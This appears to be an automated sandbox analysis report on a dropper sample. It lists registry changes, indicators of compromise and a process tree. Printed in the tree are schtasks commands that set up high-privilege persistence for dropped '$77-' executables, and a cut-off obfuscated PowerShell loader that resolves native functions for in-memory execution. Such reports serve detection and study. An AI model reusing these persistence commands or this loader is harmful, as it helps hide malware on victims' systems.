Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{885A186E-A440-4ADA-812B-DB871B942259}\Rev = "0" Explorer.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2394516847-3409208829-2230326962-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\SniffedFolderType = "Videos" Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2394516847-3409208829-2230326962-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\{5FA96407-7E77-483C-AC93-691D05850DE8}\IconSize = "96" Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-2394516847-3409208829-2230326962-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2394516847-3409208829-2230326962-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\{5FA96407-7E77-483C-AC93-691D05850DE8}\LogicalViewMode = "3" Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2394516847-3409208829-2230326962-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\Shell\{5FA96407-7E77-483C-AC93-691D05850DE8}\GroupView = "0" Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-2394516847-3409208829-2230326962-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 0000000001000000ffffffff Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2394516847-3409208829-2230326962-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\Shell\{5FA96407-7E77-483C-AC93-691D05850DE8}\Rev = "0" Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-2394516847-3409208829-2230326962-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02 Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2394516847-3409208829-2230326962-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668}\Rev = "0" Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2394516847-3409208829-2230326962-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{885A186E-A440-4ADA-812B-DB871B942259}\GroupByDirection = "4294967295" Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-2394516847-3409208829-2230326962-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\MRUListEx = 0000000001000000ffffffff Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-2394516847-3409208829-2230326962-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1\0 Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2394516847-3409208829-2230326962-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\Shell\{5FA96407-7E77-483C-AC93-691D05850DE8}\FFlags = "1092616193" Explorer.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ Dropper Builder.exe Set value (int) \REGISTRY\USER\S-1-5-21-2394516847-3409208829-2230326962-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\NodeSlot = "1" Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-2394516847-3409208829-2230326962-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1\0 = 5e00310000000000d658143010004e4557464f4c7e310000460009000400efbed6581430d65814302e000000cca90200000003000000000000000000000000000000aae21d004e0065007700200066006f006c00640065007200000018000000 Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-2394516847-3409208829-2230326962-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\Shell Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-2394516847-3409208829-2230326962-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{885A186E-A440-4ADA-812B-DB871B942259} Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-2394516847-3409208829-2230326962-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-2394516847-3409208829-2230326962-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7} Explorer.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2394516847-3409208829-2230326962-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\Shell\SniffedFolderType = "Videos" Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-2394516847-3409208829-2230326962-1000_Classes\Local Settings Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2394516847-3409208829-2230326962-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668}\FFlags = "1092616209" Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-2394516847-3409208829-2230326962-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-2394516847-3409208829-2230326962-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2 Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2394516847-3409208829-2230326962-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1\NodeSlot = "3" Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-2394516847-3409208829-2230326962-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\Shell\{5FA96407-7E77-483C-AC93-691D05850DE8}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2394516847-3409208829-2230326962-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\Shell\{5FA96407-7E77-483C-AC93-691D05850DE8}\GroupByKey:PID = "0" Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-2394516847-3409208829-2230326962-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\TrayNotify Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-2394516847-3409208829-2230326962-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668} Explorer.EXE -
NTFS ADS 2 IoCs
Processes:
chrome.exeExplorer.EXEdescription ioc process File opened for modification C:\Users\Admin\Downloads\Dropper Builder.exe:Zone.Identifier chrome.exe File opened for modification C:\$Extend\$Quota:$Q:$INDEX_ALLOCATION Explorer.EXE -
Scheduled Task/Job: Scheduled Task 1 TTPs 4 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exeschtasks.exeschtasks.exepid process 7424 schtasks.exe 6588 schtasks.exe 6956 schtasks.exe 8064 schtasks.exe -
Suspicious behavior: AddClipboardFormatListener 3 IoCs
Processes:
Explorer.EXEpid process 3300 Explorer.EXE 3300 Explorer.EXE 3300 Explorer.EXE -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
chrome.exepowershell.EXE$77-aachost.exe$77-penisballs.exedllhost.exewmiprvse.exe$77-aachost.exepid process 5004 chrome.exe 5004 chrome.exe 6964 powershell.EXE 6964 powershell.EXE 6964 powershell.EXE 7108 $77-aachost.exe 7108 $77-aachost.exe 7108 $77-aachost.exe 7108 $77-aachost.exe 7108 $77-aachost.exe 7108 $77-aachost.exe 7108 $77-aachost.exe 7108 $77-aachost.exe 7108 $77-aachost.exe 7108 $77-aachost.exe 7108 $77-aachost.exe 7108 $77-aachost.exe 7108 $77-aachost.exe 7108 $77-aachost.exe 7108 $77-aachost.exe 7108 $77-aachost.exe 7108 $77-aachost.exe 7108 $77-aachost.exe 6656 $77-penisballs.exe 6656 $77-penisballs.exe 6656 $77-penisballs.exe 6964 powershell.EXE 7456 dllhost.exe 7456 dllhost.exe 7456 dllhost.exe 7456 dllhost.exe 1208 wmiprvse.exe 1208 wmiprvse.exe 1208 wmiprvse.exe 1208 wmiprvse.exe 1208 wmiprvse.exe 1208 wmiprvse.exe 1208 wmiprvse.exe 1208 wmiprvse.exe 1208 wmiprvse.exe 7456 dllhost.exe 7456 dllhost.exe 7456 dllhost.exe 7456 dllhost.exe 7456 dllhost.exe 7456 dllhost.exe 7456 dllhost.exe 7456 dllhost.exe 7456 dllhost.exe 7456 dllhost.exe 7456 dllhost.exe 7456 dllhost.exe 7456 dllhost.exe 7456 dllhost.exe 1208 wmiprvse.exe 7456 dllhost.exe 7456 dllhost.exe 7456 dllhost.exe 7456 dllhost.exe 7456 dllhost.exe 7456 dllhost.exe 7332 $77-aachost.exe 7332 $77-aachost.exe 7332 $77-aachost.exe -
Suspicious behavior: GetForegroundWindowSpam 3 IoCs
Processes:
Explorer.EXE$77-penisballs.exe$77-sdchost.exepid process 3300 Explorer.EXE 6656 $77-penisballs.exe 4608 $77-sdchost.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 64 IoCs
Processes:
chrome.exepid process 5004 chrome.exe 5004 chrome.exe 5004 chrome.exe 5004 chrome.exe 5004 chrome.exe 5004 chrome.exe 5004 chrome.exe 5004 chrome.exe 5004 chrome.exe 5004 chrome.exe 5004 chrome.exe 5004 chrome.exe 5004 chrome.exe 5004 chrome.exe 5004 chrome.exe 5004 chrome.exe 5004 chrome.exe 5004 chrome.exe 5004 chrome.exe 5004 chrome.exe 5004 chrome.exe 5004 chrome.exe 5004 chrome.exe 5004 chrome.exe 5004 chrome.exe 5004 chrome.exe 5004 chrome.exe 5004 chrome.exe 5004 chrome.exe 5004 chrome.exe 5004 chrome.exe 5004 chrome.exe 5004 chrome.exe 5004 chrome.exe 5004 chrome.exe 5004 chrome.exe 5004 chrome.exe 5004 chrome.exe 5004 chrome.exe 5004 chrome.exe 5004 chrome.exe 5004 chrome.exe 5004 chrome.exe 5004 chrome.exe 5004 chrome.exe 5004 chrome.exe 5004 chrome.exe 5004 chrome.exe 5004 chrome.exe 5004 chrome.exe 5004 chrome.exe 5004 chrome.exe 5004 chrome.exe 5004 chrome.exe 5004 chrome.exe 5004 chrome.exe 5004 chrome.exe 5004 chrome.exe 5004 chrome.exe 5004 chrome.exe 5004 chrome.exe 5004 chrome.exe 5004 chrome.exe 5004 chrome.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
chrome.exedescription pid process Token: SeShutdownPrivilege 5004 chrome.exe Token: SeCreatePagefilePrivilege 5004 chrome.exe Token: SeShutdownPrivilege 5004 chrome.exe Token: SeCreatePagefilePrivilege 5004 chrome.exe Token: SeShutdownPrivilege 5004 chrome.exe Token: SeCreatePagefilePrivilege 5004 chrome.exe Token: SeShutdownPrivilege 5004 chrome.exe Token: SeCreatePagefilePrivilege 5004 chrome.exe Token: SeShutdownPrivilege 5004 chrome.exe Token: SeCreatePagefilePrivilege 5004 chrome.exe Token: SeShutdownPrivilege 5004 chrome.exe Token: SeCreatePagefilePrivilege 5004 chrome.exe Token: SeShutdownPrivilege 5004 chrome.exe Token: SeCreatePagefilePrivilege 5004 chrome.exe Token: SeShutdownPrivilege 5004 chrome.exe Token: SeCreatePagefilePrivilege 5004 chrome.exe Token: SeShutdownPrivilege 5004 chrome.exe Token: SeCreatePagefilePrivilege 5004 chrome.exe Token: SeShutdownPrivilege 5004 chrome.exe Token: SeCreatePagefilePrivilege 5004 chrome.exe Token: SeShutdownPrivilege 5004 chrome.exe Token: SeCreatePagefilePrivilege 5004 chrome.exe Token: SeShutdownPrivilege 5004 chrome.exe Token: SeCreatePagefilePrivilege 5004 chrome.exe Token: SeShutdownPrivilege 5004 chrome.exe Token: SeCreatePagefilePrivilege 5004 chrome.exe Token: SeShutdownPrivilege 5004 chrome.exe Token: SeCreatePagefilePrivilege 5004 chrome.exe Token: SeShutdownPrivilege 5004 chrome.exe Token: SeCreatePagefilePrivilege 5004 chrome.exe Token: SeShutdownPrivilege 5004 chrome.exe Token: SeCreatePagefilePrivilege 5004 chrome.exe Token: SeShutdownPrivilege 5004 chrome.exe Token: SeCreatePagefilePrivilege 5004 chrome.exe Token: SeShutdownPrivilege 5004 chrome.exe Token: SeCreatePagefilePrivilege 5004 chrome.exe Token: SeShutdownPrivilege 5004 chrome.exe Token: SeCreatePagefilePrivilege 5004 chrome.exe Token: SeShutdownPrivilege 5004 chrome.exe Token: SeCreatePagefilePrivilege 5004 chrome.exe Token: SeShutdownPrivilege 5004 chrome.exe Token: SeCreatePagefilePrivilege 5004 chrome.exe Token: SeShutdownPrivilege 5004 chrome.exe Token: SeCreatePagefilePrivilege 5004 chrome.exe Token: SeShutdownPrivilege 5004 chrome.exe Token: SeCreatePagefilePrivilege 5004 chrome.exe Token: SeShutdownPrivilege 5004 chrome.exe Token: SeCreatePagefilePrivilege 5004 chrome.exe Token: SeShutdownPrivilege 5004 chrome.exe Token: SeCreatePagefilePrivilege 5004 chrome.exe Token: SeShutdownPrivilege 5004 chrome.exe Token: SeCreatePagefilePrivilege 5004 chrome.exe Token: SeShutdownPrivilege 5004 chrome.exe Token: SeCreatePagefilePrivilege 5004 chrome.exe Token: SeShutdownPrivilege 5004 chrome.exe Token: SeCreatePagefilePrivilege 5004 chrome.exe Token: SeShutdownPrivilege 5004 chrome.exe Token: SeCreatePagefilePrivilege 5004 chrome.exe Token: SeShutdownPrivilege 5004 chrome.exe Token: SeCreatePagefilePrivilege 5004 chrome.exe Token: SeShutdownPrivilege 5004 chrome.exe Token: SeCreatePagefilePrivilege 5004 chrome.exe Token: SeShutdownPrivilege 5004 chrome.exe Token: SeCreatePagefilePrivilege 5004 chrome.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
Processes:
chrome.exeExplorer.EXEpid process 5004 chrome.exe 5004 chrome.exe 5004 chrome.exe 5004 chrome.exe 5004 chrome.exe 5004 chrome.exe 5004 chrome.exe 5004 chrome.exe 5004 chrome.exe 5004 chrome.exe 5004 chrome.exe 5004 chrome.exe 5004 chrome.exe 5004 chrome.exe 5004 chrome.exe 5004 chrome.exe 5004 chrome.exe 5004 chrome.exe 5004 chrome.exe 5004 chrome.exe 5004 chrome.exe 5004 chrome.exe 5004 chrome.exe 5004 chrome.exe 5004 chrome.exe 5004 chrome.exe 5004 chrome.exe 5004 chrome.exe 5004 chrome.exe 5004 chrome.exe 5004 chrome.exe 5004 chrome.exe 5004 chrome.exe 5004 chrome.exe 5004 chrome.exe 5004 chrome.exe 5004 chrome.exe 5004 chrome.exe 5004 chrome.exe 5004 chrome.exe 5004 chrome.exe 5004 chrome.exe 5004 chrome.exe 5004 chrome.exe 5004 chrome.exe 5004 chrome.exe 5004 chrome.exe 5004 chrome.exe 5004 chrome.exe 5004 chrome.exe 5004 chrome.exe 5004 chrome.exe 5004 chrome.exe 5004 chrome.exe 5004 chrome.exe 5004 chrome.exe 5004 chrome.exe 5004 chrome.exe 5004 chrome.exe 5004 chrome.exe 3300 Explorer.EXE 3300 Explorer.EXE 3300 Explorer.EXE 3300 Explorer.EXE -
Suspicious use of SendNotifyMessage 64 IoCs
Processes:
chrome.exeExplorer.EXEpid process 5004 chrome.exe 5004 chrome.exe 5004 chrome.exe 5004 chrome.exe 5004 chrome.exe 5004 chrome.exe 5004 chrome.exe 5004 chrome.exe 5004 chrome.exe 5004 chrome.exe 5004 chrome.exe 5004 chrome.exe 3300 Explorer.EXE 3300 Explorer.EXE 3300 Explorer.EXE 3300 Explorer.EXE 3300 Explorer.EXE 3300 Explorer.EXE 3300 Explorer.EXE 3300 Explorer.EXE 3300 Explorer.EXE 3300 Explorer.EXE 3300 Explorer.EXE 3300 Explorer.EXE 3300 Explorer.EXE 3300 Explorer.EXE 3300 Explorer.EXE 3300 Explorer.EXE 3300 Explorer.EXE 3300 Explorer.EXE 3300 Explorer.EXE 3300 Explorer.EXE 3300 Explorer.EXE 3300 Explorer.EXE 3300 Explorer.EXE 3300 Explorer.EXE 3300 Explorer.EXE 3300 Explorer.EXE 3300 Explorer.EXE 3300 Explorer.EXE 3300 Explorer.EXE 3300 Explorer.EXE 3300 Explorer.EXE 3300 Explorer.EXE 3300 Explorer.EXE 3300 Explorer.EXE 3300 Explorer.EXE 3300 Explorer.EXE 3300 Explorer.EXE 3300 Explorer.EXE 3300 Explorer.EXE 3300 Explorer.EXE 3300 Explorer.EXE 3300 Explorer.EXE 3300 Explorer.EXE 3300 Explorer.EXE 3300 Explorer.EXE 3300 Explorer.EXE 3300 Explorer.EXE 3300 Explorer.EXE 3300 Explorer.EXE 3300 Explorer.EXE 3300 Explorer.EXE 3300 Explorer.EXE -
Suspicious use of SetWindowsHookEx 11 IoCs
Processes:
$77-penisballs.exe$77-penisballs.exeExplorer.EXELogonUI.exepid process 6656 $77-penisballs.exe 5076 $77-penisballs.exe 3300 Explorer.EXE 3300 Explorer.EXE 3300 Explorer.EXE 3300 Explorer.EXE 3300 Explorer.EXE 3300 Explorer.EXE 3300 Explorer.EXE 3300 Explorer.EXE 3956 LogonUI.exe -
Suspicious use of UnmapMainImage 2 IoCs
Processes:
RuntimeBroker.exesvchost.exepid process 3936 RuntimeBroker.exe 1100 svchost.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
rundll32.exechrome.exedescription pid process target process PID 1764 wrote to memory of 2780 1764 rundll32.exe rundll32.exe PID 1764 wrote to memory of 2780 1764 rundll32.exe rundll32.exe PID 1764 wrote to memory of 2780 1764 rundll32.exe rundll32.exe PID 5004 wrote to memory of 4520 5004 chrome.exe chrome.exe PID 5004 wrote to memory of 4520 5004 chrome.exe chrome.exe PID 5004 wrote to memory of 3236 5004 chrome.exe chrome.exe PID 5004 wrote to memory of 3236 5004 chrome.exe chrome.exe PID 5004 wrote to memory of 3236 5004 chrome.exe chrome.exe PID 5004 wrote to memory of 3236 5004 chrome.exe chrome.exe PID 5004 wrote to memory of 3236 5004 chrome.exe chrome.exe PID 5004 wrote to memory of 3236 5004 chrome.exe chrome.exe PID 5004 wrote to memory of 3236 5004 chrome.exe chrome.exe PID 5004 wrote to memory of 3236 5004 chrome.exe chrome.exe PID 5004 wrote to memory of 3236 5004 chrome.exe chrome.exe PID 5004 wrote to memory of 3236 5004 chrome.exe chrome.exe PID 5004 wrote to memory of 3236 5004 chrome.exe chrome.exe PID 5004 wrote to memory of 3236 5004 chrome.exe chrome.exe PID 5004 wrote to memory of 3236 5004 chrome.exe chrome.exe PID 5004 wrote to memory of 3236 5004 chrome.exe chrome.exe PID 5004 wrote to memory of 3236 5004 chrome.exe chrome.exe PID 5004 wrote to memory of 3236 5004 chrome.exe chrome.exe PID 5004 wrote to memory of 3236 5004 chrome.exe chrome.exe PID 5004 wrote to memory of 3236 5004 chrome.exe chrome.exe PID 5004 wrote to memory of 3236 5004 chrome.exe chrome.exe PID 5004 wrote to memory of 3236 5004 chrome.exe chrome.exe PID 5004 wrote to memory of 3236 5004 chrome.exe chrome.exe PID 5004 wrote to memory of 3236 5004 chrome.exe chrome.exe PID 5004 wrote to memory of 3236 5004 chrome.exe chrome.exe PID 5004 wrote to memory of 3236 5004 chrome.exe chrome.exe PID 5004 wrote to memory of 3236 5004 chrome.exe chrome.exe PID 5004 wrote to memory of 3236 5004 chrome.exe chrome.exe PID 5004 wrote to memory of 3236 5004 chrome.exe chrome.exe PID 5004 wrote to memory of 3236 5004 chrome.exe chrome.exe PID 5004 wrote to memory of 3236 5004 chrome.exe chrome.exe PID 5004 wrote to memory of 3236 5004 chrome.exe chrome.exe PID 5004 wrote to memory of 3236 5004 chrome.exe chrome.exe PID 5004 wrote to memory of 5016 5004 chrome.exe chrome.exe PID 5004 wrote to memory of 5016 5004 chrome.exe chrome.exe PID 5004 wrote to memory of 676 5004 chrome.exe chrome.exe PID 5004 wrote to memory of 676 5004 chrome.exe chrome.exe PID 5004 wrote to memory of 676 5004 chrome.exe chrome.exe PID 5004 wrote to memory of 676 5004 chrome.exe chrome.exe PID 5004 wrote to memory of 676 5004 chrome.exe chrome.exe PID 5004 wrote to memory of 676 5004 chrome.exe chrome.exe PID 5004 wrote to memory of 676 5004 chrome.exe chrome.exe PID 5004 wrote to memory of 676 5004 chrome.exe chrome.exe PID 5004 wrote to memory of 676 5004 chrome.exe chrome.exe PID 5004 wrote to memory of 676 5004 chrome.exe chrome.exe PID 5004 wrote to memory of 676 5004 chrome.exe chrome.exe PID 5004 wrote to memory of 676 5004 chrome.exe chrome.exe PID 5004 wrote to memory of 676 5004 chrome.exe chrome.exe PID 5004 wrote to memory of 676 5004 chrome.exe chrome.exe PID 5004 wrote to memory of 676 5004 chrome.exe chrome.exe PID 5004 wrote to memory of 676 5004 chrome.exe chrome.exe PID 5004 wrote to memory of 676 5004 chrome.exe chrome.exe PID 5004 wrote to memory of 676 5004 chrome.exe chrome.exe PID 5004 wrote to memory of 676 5004 chrome.exe chrome.exe PID 5004 wrote to memory of 676 5004 chrome.exe chrome.exe PID 5004 wrote to memory of 676 5004 chrome.exe chrome.exe PID 5004 wrote to memory of 676 5004 chrome.exe chrome.exe PID 5004 wrote to memory of 676 5004 chrome.exe chrome.exe PID 5004 wrote to memory of 676 5004 chrome.exe chrome.exe PID 5004 wrote to memory of 676 5004 chrome.exe chrome.exe PID 5004 wrote to memory of 676 5004 chrome.exe chrome.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵
-
C:\Windows\system32\dwm.exe"dwm.exe"2⤵
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{1923dcfb-2d6d-4177-b724-07d1bfc48873}2⤵
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\AppData\Local\Temp\$77-sdchost.exe"C:\Users\Admin\AppData\Local\Temp\$77-sdchost.exe"3⤵
- Executes dropped EXE
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "$77-scchost" /tr "C:\Windows\system32\config\systemprofile\AppData\Roaming\$77-scchost.exe"4⤵
- Scheduled Task/Job: Scheduled Task
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵
-
C:\Users\Admin\AppData\Local\Temp\$77-aachost.exe"C:\Users\Admin\AppData\Local\Temp\$77-aachost.exe"3⤵
- Executes dropped EXE
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "$77-aachost" /tr '"C:\Windows\system32\config\systemprofile\AppData\Roaming\$77-aachost.exe"' & exit4⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "$77-aachost" /tr '"C:\Windows\system32\config\systemprofile\AppData\Roaming\$77-aachost.exe"'5⤵
- Scheduled Task/Job: Scheduled Task
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Windows\TEMP\tmp79AF.tmp.bat""4⤵
- Modifies data under HKEY_USERS
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵
-
C:\Windows\system32\timeout.exetimeout 35⤵
- Delays execution with timeout.exe
-
C:\Users\Admin\AppData\Local\Temp\$77-penisballs.exe"C:\Users\Admin\AppData\Local\Temp\$77-penisballs.exe"3⤵
- Executes dropped EXE
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\LogonUI.exe"LogonUI.exe" /flags:0x4 /state0:0xa3998855 /state1:0x41c64e6d2⤵
- Modifies data under HKEY_USERS
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule1⤵
- Drops file in System32 directory
- Drops file in Windows directory
- Suspicious use of UnmapMainImage
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:RuIdwLFZdpne{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$UVutwbAoqZVCtH,[Parameter(Position=1)][Type]$igcSbrqbOz)$apNYbVnfyTC=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('R'+'e'+''+'f'+''+[Char](108)+''+[Char](101)+''+[Char](99)+''+[Char](116)+''+[Char](101)+''+'d'+''+'D'+''+[Char](101)+''+'l'+''+'e'+'g'+'a'+''+[Char](116)+'e')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+'I'+'n'+[Char](77)+'em'+'o'+''+[Char](114)+'y'+'M'+''+[Char](111)+''+[Char](100)+''+[Char](117)+''+[Char](108)+'e',$False).DefineType(''+'M'+''+[Char](121)+''+'D'+''+[Char](101)+''+[Char](108)+''+[Char](101)+'ga'+'t'+'eTy'+[Char](112)+''+[Char](101)+'',''+[Char](67)+''+[Char](108)+'a'+'s'+'s'+[Char](44)+''+[Char](80)+''+[Char](117)+''+[Char](98)+''+'l'+''+[Char](105)+'c'+','+''+'S'+''+[Char](101)+''+'a'+''+[Char](108)+''+[Char](101)+''+[Char](100)+''+','+''+'A'+'nsi'+[Char](67)+'la'+'s'+''+[Char](115)+','+[Char](65)+''+'u'+''+'t'+'oC'+[Char](108)+''+[Char](97)+''+[Char](115)+'s',[MulticastDelegate]);$apNYbVnfyTC.DefineConstructor('R'+[Char](84)+''+[Char](83)+'p'+[Char](101)+''+'c'+''+[Char](105)+'al'+[Char](78)+''+[Char](97)+''+[Char](109)+'e'+','+''+[Char](72)+''+[Char](105)+''+[Char](100)+''+[Char](101)+''+[Char](66)+''+[Char](121)+''+[Char](83)+''+[Char](105)+''+'g'+''+[Char](44)+''+[Char](80)+''+[Char](117)+''+[Char](98)+''+'l'+''+'i'+''+'c'+'',[Reflection.CallingConventions]::Standard,$UVutwbAoqZVCtH).SetImplementationFlags('R'+'u'+'n'+'t'+''+[Char](105)+''+[Char](109)+''+'e'+''+[Char](44)+''+[Char](77)+''+[Char](97)+'n'+'a'+'ged');$apNYbVnfyTC.DefineMethod('I'+[Char](110)+'v'+[Char](111)+''+[Char](107)+''+'e'+'','P'+[Char](117)+''+[Char](98)+''+[Char](108)+'i'+'c'+''+','+''+'H'+''+'i'+''+[Char](100)+''+'e'+''+'B'+'yS'+[Char](105)+''+[Char](103)+',N'+[Char](101)+''+[Char](119)+''+[Char](83)+'l'+'o'+''+'t'+',V'+[Char](105)+''+[Char](114)+''+[Char](116)+''+'u'+''+'a'+''+'l'+'',$igcSbrqbOz,$UVutwbAoqZVCtH).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+'n'+''+'t'+''+'i'+''+'m'+''+'e'+''+','+''+[Char](77)+''+[Char](97)+'n'+'a'+''+[Char](103)+''+[Char](101)+''+[Char](100)+'');Write-Output $apNYbVnfyTC.CreateType();}$wrKoaJuctLjFo=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+'S'+''+[Char](121)+''+[Char](115)+''+[Char](116)+''+[Char](101)+''+'m'+''+[Char](46)+''+[Char](100)+''+[Char](108)+''+'l'+'')}).GetType(''+[Char](77)+''+[Char](105)+''+'c'+''+'r'+''+[Char](111)+''+[Char](115)+''+[Char](111)+'f'+'t'+''+[Char](46)+''+[Char](87)+'i'+[Char](110)+''+[Char](51)+''+[Char](50)+''+[Char](46)+''+[Char](85)+''+[Char](110)+''+'s'+''+'a'+''+'f'+'e'+[Char](78)+''+'a'+''+[Char](116)+''+[Char](105)+''+[Char](118)+'e'+[Char](77)+''+'e'+''+'t'+''+[Char](104)+''+'o'+''+[Char](100)+''+'s'+'');$YddLyJKHpNyhAu=$wrKoaJuctLjFo.GetMethod(''+[Char](71)+''+'e'+''+[Char](116)+'Pr'+'o'+''+[Char](99)+''+'A'+''+[Char](100)+''+[Char](100)+''+'r'+''+[Char](101)+'s'+[Char](115)+'',[Reflection.BindingFlags](''+'P'+''+[Char](117)+'b'+[Char](108)+'i'+[Char](99)+''+[Char](44)+''+'S'+''+[Char](116)+''+[Char](97)+'t'+'i'+''+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object 